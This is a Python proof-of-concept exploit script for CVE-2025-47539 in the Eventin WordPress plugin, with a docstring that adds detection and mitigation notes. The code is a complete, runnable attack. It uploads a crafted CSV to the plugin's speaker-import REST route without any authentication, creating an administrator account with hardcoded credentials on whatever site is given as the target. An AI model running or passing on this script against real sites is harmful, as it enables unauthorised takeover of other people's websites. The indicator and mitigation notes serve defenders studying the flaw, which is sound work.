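#!/usr/bin/env python3
"""Proof-of-concept for CVE-2025-47539 (Eventin speaker-import REST route).

What the code below does: it writes a one-row CSV describing a user whose
role is "administrator" and POSTs it as the multipart field "speaker_import"
to /wp-json/eventin/v2/speakers/import. No cookie, nonce or Authorization
header is sent, so a "Successfully imported" reply means the route accepted
the import from an unauthenticated client.

Defender notes:
  * Detection: POST requests to the route above from clients without an
    authenticated session, and newly created administrator accounts. The
    account values in Nxploited.__init__ are fixed, so they are usable as
    indicators for unmodified copies of this script.
  * Mitigation: update the Eventin plugin to the vendor's fixed release,
    block the route at the edge until that is done, and review the
    WordPress user list for unexpected administrators.
"""
import argparse
import requests
import csv
import os
import sys
from urllib.parse import urlparse


class Nxploited:
    """Holds the target, the HTTP session and the fixed account values."""

    def __init__(self, target_url):
        """Normalise the target URL and set the constants the request uses.

        Args:
            target_url: Base URL of the WordPress site, with or without scheme.
        """
        self.url = self.validate_url(target_url)
        # REST route of the Eventin plugin that receives the CSV upload.
        self.endpoint = "/wp-json/eventin/v2/speakers/import"
        self.session = self.setup_session()
        self.headers = {"User-Agent": self.user_agent()}
        # Temporary file written to the current working directory.
        self.csv_file = "user.csv"
        # Fixed account values: anyone running the script unchanged leaves
        # exactly these strings in the site's user records.
        self.name = "Nxploited (Khaled_alenazi)"
        self.email = "Nxploit@admin.sa"
        self.username = "NxPloted"
        self.password = "nxploit123"
        self.role = "administrator"

    def validate_url(self, url):
        """Return *url* with a default http:// scheme and no trailing slash."""
        parsed = urlparse(url)
        if not parsed.scheme:
            url = f"http://{url}"
        return url.rstrip('/')

    def setup_session(self):
        """Return a requests session with TLS verification switched off."""
        s = requests.Session()
        # Certificate checks and the matching urllib3 warnings are disabled,
        # so the server's identity is never verified.
        requests.packages.urllib3.disable_warnings()
        s.verify = False
        return s

    def user_agent(self):
        """Return the static browser-like User-Agent sent with the request."""
        return "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

    def generate_csv(self):
        """Write the header row and the single account row to self.csv_file."""
        data = [[self.name, self.email, self.username, self.password, self.role]]
        with open(self.csv_file, mode='w', newline='', encoding='utf-8') as f:
            writer = csv.writer(f)
            writer.writerow(["name", "email", "username", "password", "role"])
            writer.writerows(data)

    def exploit(self):
        """Upload the CSV to the import route and report the server's answer.

        Success is decided only by the substring "Successfully imported" in
        the response body; the HTTP status code is not inspected.
        """
        self.generate_csv()
        full_url = f"{self.url}{self.endpoint}"
        # The original opened the file without ever closing it; the context
        # manager releases the handle before cleanup() removes the file.
        with open(self.csv_file, "rb") as payload:
            files = {"speaker_import": (self.csv_file, payload, "text/csv")}
            try:
                response = self.session.post(full_url, files=files, headers=self.headers)
                if "Successfully imported" in response.text:
                    print("[+] Exploitation succeeded")
                    print("[+] Response:")
                    print(response.text.strip())
                    print("\n[+] Exploited Account Details")
                    print(f" Name : {self.name}")
                    print(f" Email : {self.email}")
                    print(f" Username : {self.username}")
                    print(f" Password : {self.password}")
                    print(f" Role : {self.role}")
                else:
                    print("[-] Exploitation failed")
                    print(response.text.strip())
            except Exception as e:
                # Best-effort tool: any request error is printed, not raised.
                print(f"[-] Error occurred: {e}")

    def cleanup(self):
        """Delete the temporary CSV file if it exists."""
        if os.path.exists(self.csv_file):
            os.remove(self.csv_file)


def print_banner():
    """Print the ASCII banner and the author line."""
    # NOTE(review): the banner appears to have lost its line breaks when the
    # page was extracted; the text is kept exactly as found.
    banner = r''' ###### ## ## ######## ####### ##### ####### ######## ## ######## ######## ####### ####### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ###### ####### ####### ## ## ####### ####### ####### ## ## ## ####### ####### ######## ## ## ## ## ## ## ## ## ## ######### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ###### ### ######## ######### ##### ######### ###### ## ## ###### ####### ####### '''
    print(banner)
    print("By:Nxploited (Khaled_alenazi) | NxploitBot@gmail.com")


def main():
    """Parse -u/--url, run the upload once, then remove the temporary CSV."""
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-47539 # By Nxploited (Khaled Alenazi)")
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g. http://target.com)")
    args = parser.parse_args()
    print_banner()
    tool = Nxploited(args.url)
    tool.exploit()
    tool.cleanup()
    print("\nExploit: By: Nxploited (Khaled_alenazi)")
    print("Use this script for educational purposes only. I am not responsible for your actions.")


if __name__ == "__main__":
    main()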